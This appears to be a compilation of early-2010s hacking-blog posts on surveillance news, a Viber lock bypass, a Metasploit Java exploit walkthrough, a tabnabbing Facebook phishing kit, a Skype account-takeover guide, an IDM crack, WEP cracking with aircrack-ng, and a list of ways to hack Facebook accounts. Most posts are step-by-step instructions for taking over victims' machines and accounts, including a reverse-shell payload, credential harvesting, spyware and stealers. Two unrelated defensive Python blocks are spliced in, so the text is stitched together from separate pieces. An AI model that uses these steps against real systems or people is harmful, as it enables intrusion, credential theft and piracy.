
US Govt is Watching Your Emails, Images, Videos, Search History, Skype Calls, Files, Chats

You may have suspected that the US government is watching you through Gmail, Facebook and other internet giants that hold your most sensitive and private data.
The news is that those fears were justified: a newly revealed secret document has proven the existence of a US government program that grants the NSA (National Security Agency) and the FBI direct access to the servers of Google, Facebook, Microsoft, Skype, Yahoo, Apple and other internet companies, from which they can extract any user information at will.
Named PRISM, the program was sanctioned by President Bush in 2007 and renewed by President Obama in December 2012.
Under this program, the tech giants gave US government agencies direct access to their servers, through which the agencies can grab any information they want without any hurdle.
The information that the NSA can access may include your emails, chats, search history, images, videos, Skype calls (even the content of Skype calls), YouTube videos (even private ones), files stored on your computer, call records from your smartphone, SMS, MMS, places you visit and much more.
Microsoft joined this program before anyone else, followed by Yahoo and Google. Facebook, Skype, YouTube, AOL and Apple are also program partners that have given direct access, so the agencies can obtain information of any kind about any user of these services.
Dropbox is likely to be added to the list of partner companies soon.
PRISM enables US government agencies to reach directly into the servers of the participating companies and obtain both stored communications as well as perform real-time collection on targeted users.
Interestingly, US agencies call PRISM “one of the most valuable, unique and productive accesses for NSA”.
Another fact, which may worry our local “Privacy and Internet Freedom Activists” even more, is that Pakistan is the second-largest spying target of the NSA, after Iran. Over 13.5 billion reports were gathered from Pakistan in March 2013 alone.
Given the amount of data we share with these companies, including our personal and private information, this revelation is alarming and raises countless serious questions about the morality of the tech companies and the US government.

Hackers Can Access Your Mobile Using VIBER

Security experts have found a way to gain full access to Android phones using the popular messaging application "VIBER". It needs just two phones, both running Viber, and a mobile number.
How it works. The victim phone is locked, but it has Viber installed and set up. The attacker phone sends a message to the victim, which brings up an alert window on the lockscreen. One of the unique features of Viber is that you can respond even while the phone is locked, and activating the Viber keyboard is the next step in the attack. Once the keyboard is active on the victim phone, the attacker sends another message. This time, press the back button on the victim phone, and suddenly you have full access to the victim phone.


This exploit requires two things that most attackers don't have.
1) An attacker needs physical access to your phone. Without your phone, it wouldn't matter if it was locked or unlocked, since the attacker couldn't do anything.
2) An attacker would need to have your Viber user information to send you a message. Even if your phone was stolen and the attacker somehow knew that you were a Viber user, they'd still need to send your specific phone a message.
A patch for this exploit has been released. Update your Android before others invade it.

How To Earn Money Online : Guaranty $100 For One Article

Everyone wants to earn money, whatever their work. Some earn money working offline, some from their websites; there are many ways to earn money, and they vary according to each individual's situation.
I was searching for effective ways to earn money online and I found something very interesting and real. Out of many fake internet sites and ideas, I found this idea the best of all.
It turned out to be true that we can earn 100 dollars for one article, with a few terms and conditions, but they are logical.
How do we do it?
Yes, the question is how we earn money. It's very simple: you just have to write an article. ;)
It's not as simple as it sounds. 100 dollars for one article means you have to do smart work: you have to write about 10 very unique things which you think suit a "top 10" title, for example “Top 10 weird restaurants”, with their images and proof of their existence. Proof can be the URL of the page where you got that information.
Where to submit the article and its proof?
You have to submit your article and valid information as required to www.listverse.com. listverse.com is a site about top lists of everything in this world. They accept articles from every deserving person and pay 100 dollars for a single article. They are creative and combine the top existing similar things around the globe in one article with complete details, and share them with the whole world on their website. To achieve the goal of covering everything, they even pay for the knowledge and creativity of those who have different ideas.
For more rules and regulations of listverse.com click here
How do we earn money?
If your submitted information is found to be original and valid on the internet, then listverse.com pays $100 via PayPal to your account to publish that article on their website.
Isn’t it interesting that you have to use a bit of your brain and you can earn $100 for one article?
Those who are creative and innovative can at least try and have a chance to win 100 dollars. Make sure that you have a PayPal account before submitting your article.

How to Hack Remote Computer using Metasploit by exploiting Java Vulnerability

In this post I am going to demonstrate how to use the Metasploit tool to exploit the popular Java AtomicReferenceArray Type Violation vulnerability (CVE-2012-0507).

Requirements:

VirtualBox
Target OS(windows,...)
PenTesting Distro(Backtrack )
JRE 6(unpatched version)

I am assuming you already know how to set up virtual machines and how to install backtrack etc

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and type "msfupdate". This will update the Metasploit Framework (MSF) with the latest exploits and payloads. As CVE-2012-0507 is the latest vulnerability, you have to update the MSF before proceeding further.

Part III :
Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:

Step 1:
Open the Terminal and type "msfconsole". This will bring up the Metasploit console, where you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray" . This command will use the java_atomicreferencearray.rb module for the attack.

Now type "show options" to display which settings are available and/or required for this specific module.

Then type "set SRVPORT 80".
and "set URIPATH /".

Step 3: Set Payload
Type "show payloads"; this will display the list of payloads. We are going to use the 'reverse_tcp' payload. This payload opens a reverse TCP connection from the Target to the PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.

set LHOST [IP_address] : In order to get reverse connection, we have to set our IP in the LHOST.

Open the Terminal and type "ifconfig". This will display the IP info of our PenTesting Machine. The IP will be "192.168.56.x". For example, let us say the IP is 192.168.56.10.

Now Type in the msfconsole as "set LHOST 192.168.56.10".

Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine.

Step 1:
Type "exploit" in the msfconsole. This will start the reverse handler on our machine, and it will wait for anyone who connects to our HTTP server (e.g. http://192.168.56.10/). Once the victim connects to our server, it will send a JAR file that exploits the CVE-2012-0507 vulnerability.

Step 2:

Open the Firefox/IE in the Target machine.
Enter "http://192.168.56.10/".
It loads nothing but exploit will run in the background.
Step 3:
Open the BT5 machine,

Now type "sessions"; this will show the list of active sessions.

Type "sessions -i 1"; this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter lets you interact with and control the Target.

Step 4:Upload files
We got backdoor to the Target machine :) , now we can run any commands in the Target.

For Example, Typing 'sysinfo' will display the system information.

You can also upload and execute your own executable files in the Target machine.

"upload /Test.exe c:\\": this command will upload Test.exe from the root ('file system' dir) folder of the BT5 to the C drive of the Target.

"execute -f C:\\Test.exe": this command will run our uploaded file on the Target.

There you have it.. Now you are in the remote computer and you can do pretty much anything :)

How To Hack Facebook Accounts By Tabnabbing

Phishing is the simplest way that you can use to hack Facebook, Gmail or any other email accounts. In this article I'll teach how you can use tabnabbing (an advanced phishing technique) to hack Facebook accounts. If you're new to phishing or you don't know what tabnabbing is, then I would strongly suggest you read the following articles before reading this one.






Tabnabbing is an advanced phishing technique. It requires a lot of coding, but I have tried to keep it as simple as possible. I hope you like the following tutorial.

Requirements 

1. You should know how phishing and tabnabbing work; if not, read the following articles

  1. What is Phishing 
  2. Hack Facebook accounts by Phishing 
  3. Tabnabbing - A New Type of Phishing Attack

2. A Free Web Hosting Account - You can use 110mb.com or ripway.com


3. You should have the following files which are required for tabnabbing   

  1. Facebook.html  -Fake Facebook login page (phisher) 
  2. login.php - Script which captures the login details of the victim
  3. google.html - Standard google page used to trick the user
  4. tabnabb.js - Java script which is required for tabnabbing
You can download all the files from Here  & to get the password Click Here


Procedure 
1. First of all, download all the files and extract them using WinRAR or WinZip. Then upload facebook.html, login.php & google.html to your free web hosting account


2. Now open tabnabb.js using a notepad , Search for "Enter your URL here" , Now replace it with your "Facebook.html" url which you uploaded in the previous step, finally save it and upload  tabnabb.js to your hosting account

3. By now you should have successfully uploaded all the four files to your hosting account as shown


4. Now to check whether the hack is working, click on the google.html link and open it , Now open few new tabs , After some time you will see google page switched to your fake Facebook page

5. Now once the victim enters all his credentials in our fake Facebook login page and clicks login, he will be redirected to the Facebook.com/careers page to avoid suspicion

6. To see the victim's login details, go to your hosting account, where you will see a new file "log.txt". Open it to see the victim's user ID and password

Download IDM Latest 2013 Full Version Registered Crack + Patch + Keygen


Internet Download Manager is one of the most popular and best download manager tools. Most of us prefer IDM for downloading because of its awesome features. But this useful application is not free; we have to pay for it. It comes with a 1-month trial period, and after the trial ends you have to buy the application. Most of us use patches and cracked versions of IDM, without considering that most patches or cracked software may contain viruses. So here I will describe how to crack IDM manually so that you will be safe from possible virus attack and also get lifetime validity on your IDM. When we update IDM it shows that IDM is registered with a fake serial number and exits, and then it stops downloading. By using this trick your IDM is registered for life and you will not get any error when updating next time.

Download Here
http://www.4shared.com/get/stZ-9bpT/DM14.html

Trick to Disable Automatic update of IDM

Hi friends,

Even though it's not so easy to stop IDM from updating, let's give it a try.

Here is a trick to disable automatic update of IDM

Solution 1

This is a much more effective way of stopping the update checks. You will need to open up regedit (there is no need to run as administrator) and go to the following key:

HKEY_CURRENT_USER\Software\DownloadManager
and then change the “LastCheck” and/or “LastTry” value to something like, e.g.:

[10/22/15]
Then restart your computer!


Solution 2
You can set up your firewall to block these IPs on ALL ports: 174.133.70.198 AND 174.133.70.98, AND this host: star.tonec.com
Then it won't be able to access its update server.

Hack any skype account in 6 easy steps

A major vulnerability in Skype's password reset system went public today.
The only thing you need to obtain full access to any Skype account is the primary email of that account (the email used when the Skype account was registered).
The following guide covers both how an account can be stolen and how to protect your account (scroll down for that).
Update 1 (November 14, 2:00am PDT): Skype disabled the password reset system, so the link in step 4 is not working for me now (starting from November 14, 2 am PDT).
Update 2 (November 14, 6:00am PDT): Skype re-enabled the password reset system, but now it will not send the recovery token to the attacker's client. The hole (gate, almost highway road) is closed.

For example, I know somebody's email - crackme33@yahoo.com , let's hack his Skype!

1. Go to the Skype website, register new disposable account. In email field, put target's email.

If the email you typed into the form is attached to some Skype account, then it will say "You already have a Skype account", which means you can hack it!
So, complete the form: provide some fake DOB, gender and country, answer the question "How do you intend to use Skype?" as personal, fill in any Skype name (REMEMBER IT; it will give you some suggestions of names not taken), assign some password (REMEMBER IT), solve the captcha, and proceed by pushing the continue button.
You will be redirected to your new account dashboard. Log out from it.
 
2. Run the Skype application with those new credentials.
3. Since we just logged in to a fresh account, at home screen of the Skype application, there will be advertisement "Find your friends and say hello", click somewhere to bring focus on that part of screen (I clicked where the red cross is drawn):
Then push F5 button on your keyboard, it will refresh the home screen. Do that 3-4 times until you see "Bring your Facebook friends into Skype" advertisement. Click "No thanks, blah-blah-blah".
You will get the home screen with some banner. 
4. Go to Skype's password reset system.Put the target's email. In my case - crackme33@yahoo.com .
Click "Submit button", and after several seconds, you will see Skype's pop-up notification - "Password token".
5. Go to Skype application, on the home screen you will see Password token, click on "more info", go to "temporary code link":
6. Browser will open page, where you can select any skype account registered to target email, in my case there are two account - my disposable and target:
Choose target's account and click "Change password and sign me in":
 You will be redirected to login form:






You are all set!
P.S. I have changed primary email for that test accounts, so do not try hack them. Just in case. =)

How to protect your accounts

You already changed password for the target account, know the skype login, and able to use that target skype account. But somebody could take it back from you, just as you did (owner for example).
To prevent that you need to change your primary email to some address, unknown to anyone.

To do that:
1. Sign in on skype website.
2. Go into the "profile" link:


3. On account information, go down, to "Contact details", click "Add email address":
4. Add your email address, which is unknown to anybody but you:
Click save button at the bottom of the form. After page reload, refresh page again to prevent some strange glitches of the site (if you will not reload the page, after you do following steps, it will forget steps 4 and 5 and discard that little work).
5. Scroll to Contact details again. Click on "Add email address" again. Switch primary email to the new one:
Click "Save" button at the bottom of the form, again.
It will ask you for your password. You know it already. Type password and click button by mouse, not by "Enter" key.
After page reload, refresh page again to prevent some strange glitches of the site (described above).
6. Scroll to Contact details again. Click on "Add email address" again. Delete (with backspace and/or delete buttons) all emails but primary:

7. Click the "Save" button at the bottom of the form. Make sure all your changes are applied (it sometimes requires two or more attempts, since the site is developed by curly-handed programmers).
8. Tell your friends how to protect a Skype account. ASAP
At this time there is no other way to protect your Skype account, except changing the primary email to some unknown address.
Once an account is stolen, the thief has the ability to retrieve all your IM history from other peers.
If you have already lost your account, contact all your necessary contacts and tell them to remove you from their contact lists. This prevents IM history interchange (if it has not already happened).

Here is how the target's mailbox looks:



Thus the target will receive notifications regarding the password change, but the initial owner has less than one minute to understand and take action. It is almost impossible to log in to the Skype website and change emails when a hacker is already there.
Disclaimer: The information provided on in this blog is to be used for educational purposes only. The blog author is in no way responsible for any misuse of the information provided.
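
The root cause described in this post, and the fix reported in Update 2, can be modelled in a few lines. The following Python model is an added example, not Skype's code and not part of the original post: the class, field and account names are hypothetical, the address is a placeholder, and the "verified e-mail" check in the hardened variant is an assumption about what a sound design would add.

```python
import secrets
from collections import defaultdict
from dataclasses import dataclass, field

EMAIL = "owner@example.test"  # constructed placeholder address


@dataclass
class Account:
    name: str
    email: str
    email_verified: bool                               # mailbox ownership proven?
    client_inbox: list = field(default_factory=list)   # in-app notifications


class ResetService:
    """Toy model of a password-reset flow (hypothetical, not Skype's code)."""

    def __init__(self, hardened: bool):
        self.hardened = hardened
        self.accounts = {}                   # account name -> Account
        self.mailboxes = defaultdict(list)   # e-mail address -> tokens sent by mail
        self.tokens = {}                     # live token -> e-mail it was issued for

    def register(self, name, email, email_verified=False):
        # As the post describes, sign-up accepts an address that is already
        # attached to another account and does not wait for confirmation.
        self.accounts[name] = Account(name, email, email_verified)
        return self.accounts[name]

    def request_reset(self, email):
        token = secrets.token_urlsafe(16)
        self.tokens[token] = email
        # Out-of-band delivery: only someone who controls the mailbox reads this.
        self.mailboxes[email].append(token)
        if not self.hardened:
            # The flaw: the token is also pushed as an in-app notification to
            # every account that merely claims this address.
            for acct in self.accounts.values():
                if acct.email == email:
                    acct.client_inbox.append(token)

    def eligible_accounts(self, token):
        email = self.tokens.get(token)
        if email is None:
            return []
        return sorted(
            a.name for a in self.accounts.values()
            if a.email == email and (a.email_verified or not self.hardened)
        )

    def reset_password(self, token, account_name):
        if account_name not in self.eligible_accounts(token):
            return False
        del self.tokens[token]               # tokens are single use
        return True


def run_scenario(hardened):
    """Register a verified owner and an unverified second account on the
    same address, request a reset, and report where the token ended up."""
    svc = ResetService(hardened)
    svc.register("owner", EMAIL, email_verified=True)
    second = svc.register("second", EMAIL)   # never proves mailbox ownership
    svc.request_reset(EMAIL)
    leaked = list(second.client_inbox)
    return {
        "token_in_unverified_client": bool(leaked),
        "owner_reset_by_second": bool(leaked) and svc.reset_password(leaked[0], "owner"),
        "token_in_mailbox": len(svc.mailboxes[EMAIL]) == 1,
    }


if __name__ == "__main__":
    print("vulnerable:", run_scenario(hardened=False))
    print("hardened:  ", run_scenario(hardened=True))
```

In the hardened run the token reaches only the mailbox, so changing the password again requires control of the e-mail account itself.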

How to Find who unfriends You in Facebook

First go to: http://www.outandin.info/ 
 and click “Login with Facebook”
 

7 Ways To Speed Up Windows 7

With the release of Windows 7, Microsoft may just have introduced the fastest operating system in the world. For those speed junkies who are never satisfied, we have provided a few tips that will help you make your PC even faster.

Disable Automatic Disk Defragmentation

The Automatic Disk Defragmentation feature in Windows is designed to maintain the health of the operating system. However, it also makes Windows run a little slower. You can put an end to this by disabling the feature and manually running at your leisure. To do so, click “Start” and select “Computer.” Next, right click on your primary hard drive and select “Properties.” Lastly, select the “Tools” tab, click “Defragment Now” and uncheck the “Run on a schedule” option.

Utilize ReadyBoost

ReadyBoost is a built-in Windows 7 feature that allows you to use a USB flash drive to enhance system performance. How is this possible? The drive itself acts as additional computer memory!
In order to make use of this feature, you will need a USB drive with at least 2 GB of space. From there, you simply connect the drive to your computer, click “Start” and select “Computer.” Next, click on the USB drive and select “ReadyBoost.” Lastly, select “Use this device” and choose as much capacity as possible below on the “Space to reserve for system speed” slide.

Disable Windows Transparency

The transparency of windows is a great perk from a presentation aspect, but this may not be the case for those with older hardware as it can drastically impact performance. The good thing is that transparency can be disabled with ease. Simply right-click on your desktop, select “Personalize,” choose the active theme and then navigate to “Windows Color.” Finally, uncheck the “Enable Transparency” option.

Disable Unwanted Features

There may be numerous Windows 7 features that you really don’t need. These same features could also slow down your computer. To disable them, click on “Start,” choose “Control Panel” and then select “Programs and features.” Next, select the “Turn Windows features on or off” option, navigate through the list and uncheck all the features you want to disable. Once you are done, simply click “OK” to remove those features.

Disable Startup Services

Startup services are notorious for slowing down performance in XP and Vista. The same holds true for Windows 7. You can disable unwanted services by hitting “Start,” typing “msconfig” in the search bar and clicking “Enter.” Click the “Services Tab” on the next window and deselect the services you do not want to automatically run at startup. While this all depends on preference, services that impact performance the most include “Offline Files,” “Tablet PC Input Services,” “Terminal Services,” “Fax” and “Windows Search.”

Disable Minimizing/Maximizing Animations

Many users have already fallen in love with the minimizing and maximizing animation effects of windows. However, some may find it irritating after a while as it can eventually lead to slowdowns. If you want to disable this function, hit “Start,” enter “System Properties Performance” in the search bar and click “OK.” On the next screen, deselect the “Animate window when minimizing and maximizing” option and click “OK.”

Update Your Windows 7 Drivers

Lastly, ensure that you have the latest device drivers made specifically for Windows 7. Since your PC can have hundreds of drivers installed in it at any given time, this task can be tedious. Luckily there are 3rd party utilities out there such as DriverFinder™, which can greatly speed up this process.

Simple Wi-Fi WEP Crack [TUTORIAL]


Overview

To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.
Equipment used
Wifi Adaptor : Alfa AWUS036H (available on eBay & Amazon)
Software : Backtrack 4 (Free download from http://www.backtrack-linux.org)

Step 1 – Start the wireless interface in monitor mode on AP channel

airmon-ng start wlan1 6
starts wifi interface in channel 6

Step 2 – Test Wireless Device Packet Injection

aireplay-ng -9 -e infosec -a 00:1B:11:24:27:2E  wlan1
-9 means injection test
-a 00:1B:11:24:27:2E is the access point MAC address

Step 3 – Start airodump-ng to capture the IVs

airodump-ng -c 6 --bssid 00:1B:11:24:27:2E -w output wlan1

Step 4 – Use aireplay-ng to do a fake authentication with the access point

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.
aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
-1 means fake authentication
0 reassociation timing in seconds
-e infosec is the wireless network name
-a 00:1B:11:24:27:2E is the access point MAC address
-h 00:c0:ca:27:e5:6a is our card MAC address
OR
aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
2 – Reauthenticate every 2 seconds.
-o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 – Send keep alive packets every 10 seconds.
Troubleshooting Tips

Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and…
Run: tcpdump -n -vvv -s0 -e -i wlan1 | grep -i -E "(RA:|Authentication|ssoc)"

You would then look for error messages.
If at any time you wish to confirm you are properly associated, use tcpdump and look at the packets. Start another session and…
Run: “tcpdump -n -e -s0 -vvv -i wlan1”

Here is a typical tcpdump error message you are looking for:
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station
Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.
If you want to select only the DeAuth packets with tcpdump then you can use: “tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth”. You may need to tweak the phrase “DeAuth” to pick out the exact packets you want.

Step 5 – Start aireplay-ng in ARP request replay mode

aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

Step 6 – Run aircrack-ng to obtain the WEP key

aircrack-ng -b 00:1B:11:24:27:2E output*.cap
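
The tcpdump line quoted in the troubleshooting tips is also what an access-point operator sees when an unassociated MAC address tries to push traffic at the AP. As an added example (not from the original post), this Python script parses capture lines in that format and flags stations the AP keeps rejecting; every sample line except the first is constructed, and the threshold and time window are assumptions.

```python
import re
from collections import defaultdict

MAC = r"((?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})"
DEAUTH_RE = re.compile(
    r"^(\d{2}):(\d{2}):(\d{2}\.\d+)\s+.*?"
    r"BSSID:" + MAC + r"\s+DA:" + MAC + r"\s+SA:" + MAC +
    r"\s+DeAuthentication:\s*(.*)$"
)

# First line is the one quoted in the article; the rest are constructed.
SAMPLE_LINES = [
    "11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station",
    "11:04:34.900000 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station",
    "11:04:35.000000 314us BSSID:00:14:6c:7e:40:80 DA:Broadcast SA:00:14:6c:7e:40:80 Beacon (infosec)",
    "11:04:35.500000 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station",
    "11:04:36.100000 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station",
    "11:05:10.000000 314us BSSID:00:14:6c:7e:40:80 DA:aa:bb:cc:dd:ee:01 SA:00:14:6c:7e:40:80   DeAuthentication: Deauthenticated because sending station is leaving",
    "11:06:00.000000 314us BSSID:00:14:6c:7e:40:80 DA:aa:bb:cc:dd:ee:02 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station",
    "11:06:30.000000 314us BSSID:00:14:6c:7e:40:80 DA:aa:bb:cc:dd:ee:02 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station",
]


def parse_deauth(line):
    """Return the fields of a DeAuthentication line, or None for other lines."""
    m = DEAUTH_RE.match(line.strip())
    if m is None:
        return None
    hh, mm, ss, bssid, da, sa, reason = m.groups()
    return {
        "t": int(hh) * 3600 + int(mm) * 60 + float(ss),  # seconds since midnight
        "bssid": bssid.lower(),
        "da": da.lower(),
        "sa": sa.lower(),
        "reason": reason.strip(),
    }


def find_rejected_stations(lines, threshold=3, window_s=10.0):
    """Map (bssid, station) -> largest number of 'nonassociated' deauths the
    AP sent to that station inside any window_s-second window, for stations
    that reach the threshold. Midnight wrap-around is not handled."""
    times_by_pair = defaultdict(list)
    for line in lines:
        ev = parse_deauth(line)
        if ev is None:
            continue
        if ev["sa"] != ev["bssid"]:
            continue  # only count frames addressed from the AP itself
        if "nonassociated" not in ev["reason"].lower():
            continue  # ordinary disconnects are not of interest here
        times_by_pair[(ev["bssid"], ev["da"])].append(ev["t"])

    flagged = {}
    for pair, times in times_by_pair.items():
        times.sort()
        best, start = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window_s:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[pair] = best
    return flagged


if __name__ == "__main__":
    for (bssid, station), count in find_rejected_stations(SAMPLE_LINES).items():
        print(f"AP {bssid} rejected unassociated station {station} {count} times in 10 s")
```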

iPhone Ends 2012 on a High, Becomes the Top-Selling Smartphone

And here’s a company which finds success in defeats too. Apple, the manufacturer which is currently getting a bit unpopular among hardcore smartphone users nowadays is seeing its two iPhone models, the iPhone 5 and 4S become the most sold smartphones in the last quarter of 2012. Both the phones captured 12.6 and 8 percent market-shares respectively. That’s more than Samsung’s Galaxy S III flagship which scored 7.1 percent market share in the same quarter.
The sales of the iPhone 5 and 4S were 27.4 and 17.4 million respectively, compared to the 15.4 million of Galaxy S III.
These were, in fact, numbers which the predecessors of these smartphones took many months, even years, to achieve.
The sales of the Samsung smartphone may have been down due to the ever-increasing rumours surrounding its next flagship which will most-probably be revealed next month. It’s interesting to see that more than a year old iPhone 4S earned a high market-share too, despite being ridiculed in its first few months.
The success can be attributed to the fact that its price has dropped quite much since its launch and also because of it getting the latest iOS 6 update just like its predecessors about time as well.
The success of the iPhone 5 wasn’t any surprise though, as Apple sold 5 million units of the iPhone 5 in the launch weekend. It will be interesting to see, however, which way this number will go in the coming months with the launch of the Samsung Galaxy S IV, among other smartphones.

Pakistan Hacker Explains How Pakistan google and other sites got hacked


Recently, the news about the Pakistani Google hack spread like wildfire on the Internet. At the time, top-level Pakistan domains displayed the defacement page, including Yahoo, MSN, HSBC, eBay, PayPal and more sites.

Today, khanisgr8, a hacker from a Pakistani hacker collective called "TeamBlackHats", sent an email regarding the security breach. He explains how those websites got hacked by the Turkish hacker group "EBoz".

The day before yesterday we mentioned that those hacked sites' DNS records pointed to a different free hosting site. We also reported that the sites might have been hacked using a PKNIC vulnerability.

PKNIC is responsible for the administration of the .PK domain name space, including the operation of the DNS for the Root-Servers for .PK domains,
and registration and maintenance of all .PK domain names. PKNIC is operated as a self-supporting organization.

The hackers claim to have discovered Boolean-based blind SQL injection, persistent cross-site scripting and sensitive directory disclosure vulnerabilities in the official website of PKNIC.

They provided us the vulnerable link with a POC to exploit it. They also sent some data compromised using the vulnerability, which contains database details, usernames and hashed passwords.


He also provided a screenshot of the cross-site scripting vulnerability. When I tried to verify the XSS vulnerability, I just searched Google for the URL and visited a PKNIC link. After visiting the link, I just saw the text "<script>alert("HACKED BY COde InjectOr")</script>". Maybe the Code Injector team attempted to exploit the vulnerability.

"Apparently Google Pakistan has been defaced by a Turkish Hacker group 'Eboz' . It's still quite hard to believe that Google server has been hacked. They really need to put a lot of focus on their defenses because if one website got hacked that means every other websites can be hacked. " they said.

We have sent an email to PKNIC regarding the vulnerability and are waiting for their response. We are not sure whether the vulnerability is fixed or not, so we are not providing the vulnerable link here.

How to Show Who Is Online On Facebook While You Are Offline Mode

First log in to Facebook, then set chat to offline in your Facebook account.
Go to the http://www.facebook.com/onlinenow page.
Click on Allow
After installing this application you are able to see who is online on Facebook while you are offline on your Facebook account.


Top 10 Ways How Hackers Can Hack Facebook Accounts In 2013

Facebook is one of the most widely used social networking sites, with more than 750 million users, which is why it has become the number 1 target of hackers. I have written a couple of posts related to Facebook hacking, in which I mentioned the top methods used by hackers to hack Facebook accounts. However, lots of things have changed in 2012: lots of methods have become outdated or have been patched by Facebook, and lots of new methods have been introduced. So in this post I will write about the top 10 methods hackers can use to hack Facebook accounts in 2011.




So here are the top 10 methods which have been the most popular in 2011:


1. Facebook Phishing 




Phishing is still the most popular attack vector used for hacking Facebook accounts. There are a variety of methods to carry out a phishing attack. In a simple phishing attack a hacker creates a fake login page which looks exactly like the real Facebook page and then asks the victim to log in to that page. Once the victim logs in through the fake page, the victim's "Email Address" and "Password" are stored in a text file. The hacker then downloads the text file and gets his hands on the victim's credentials.


2. Keylogging 

Keylogging, according to me, is the easiest way to hack a Facebook password. Keylogging can sometimes be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which, once installed on the victim's computer, will record everything the victim types on his/her computer. The logs are then sent back to the attacker either by FTP or directly to the hacker's email address. I have dedicated half of my newest book, "An introduction to keyloggers, RATS And Malware", to this topic.

3. Stealers 



Almost 80% of people use passwords stored in their browser to access Facebook. This is quite convenient but can sometimes be extremely dangerous. Stealers are software specially designed to capture the saved passwords stored in the victim's browser. Stealers, once FUD, can be extremely powerful. If you want to know how stealers work and how you can set up your own one, kindly refer to the book above.


4. Session Hijacking




Session hijacking can often be very dangerous if you are accessing Facebook over an http:// connection. In a session hijacking attack a hacker steals the victim's browser cookie, which is used to authenticate a user on a website, and uses it to access the victim's account. Session hijacking is widely used on LANs. I have already written a three-part series on how session hijacking works and also a separate post on Facebook session hijacking.


5. Sidejacking With Firesheep


The sidejacking attack became common in late 2010; however, it's still popular nowadays. Firesheep is widely used to carry out sidejacking attacks. Firesheep only works when the attacker and victim are on the same Wi-Fi network. A sidejacking attack is basically another name for HTTP session hijacking, but it's more targeted towards Wi-Fi users.

To know more about sidejacking attack and firesheep, read the post mentioned below:

6. Mobile Phone Hacking



Millions of Facebook users access Facebook through their mobile phones. If the hacker can gain access to the victim's mobile phone, then he can probably gain access to his/her Facebook account. There is a lot of mobile spying software used to monitor a cellphone.

The most popular mobile phone spying software packages are:

1. Mobile Spy
2. Spy Phone Gold

7. DNS Spoofing 


If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack to replace the original facebook.com page with his own fake page and hence get access to the victim's Facebook account.




8. USB Hacking 

If an attacker has physical access to your computer, he could just insert a USB drive programmed to automatically extract the passwords saved in the browser. I have also posted about this attack, which you can read by accessing the link below:
9. Man In the Middle Attacks


If the victim and attacker are on the same LAN and on a switch-based network, a hacker can place himself between the client and the server, or he could also act as the default gateway, and hence capture all the traffic in between. ARP poisoning, which is the other name for man-in-the-middle attacks, is a very broad topic and is beyond the scope of this article. We have written a couple of articles on man-in-the-middle attacks, which can be accessed from the links mentioned below:
If you are really interested in learning how man-in-the-middle attacks work, you can view the presentation below by oxid.it.

10. Botnets 


Botnets are not commonly used for hacking Facebook accounts because of their high setup costs. They are used to carry out more advanced attacks. A botnet is basically a collection of compromised computers. The infection process is the same as for keylogging; however, a botnet gives you additional options for carrying out attacks with the compromised computers. Some of the most popular botnets include Spyeye and Zeus.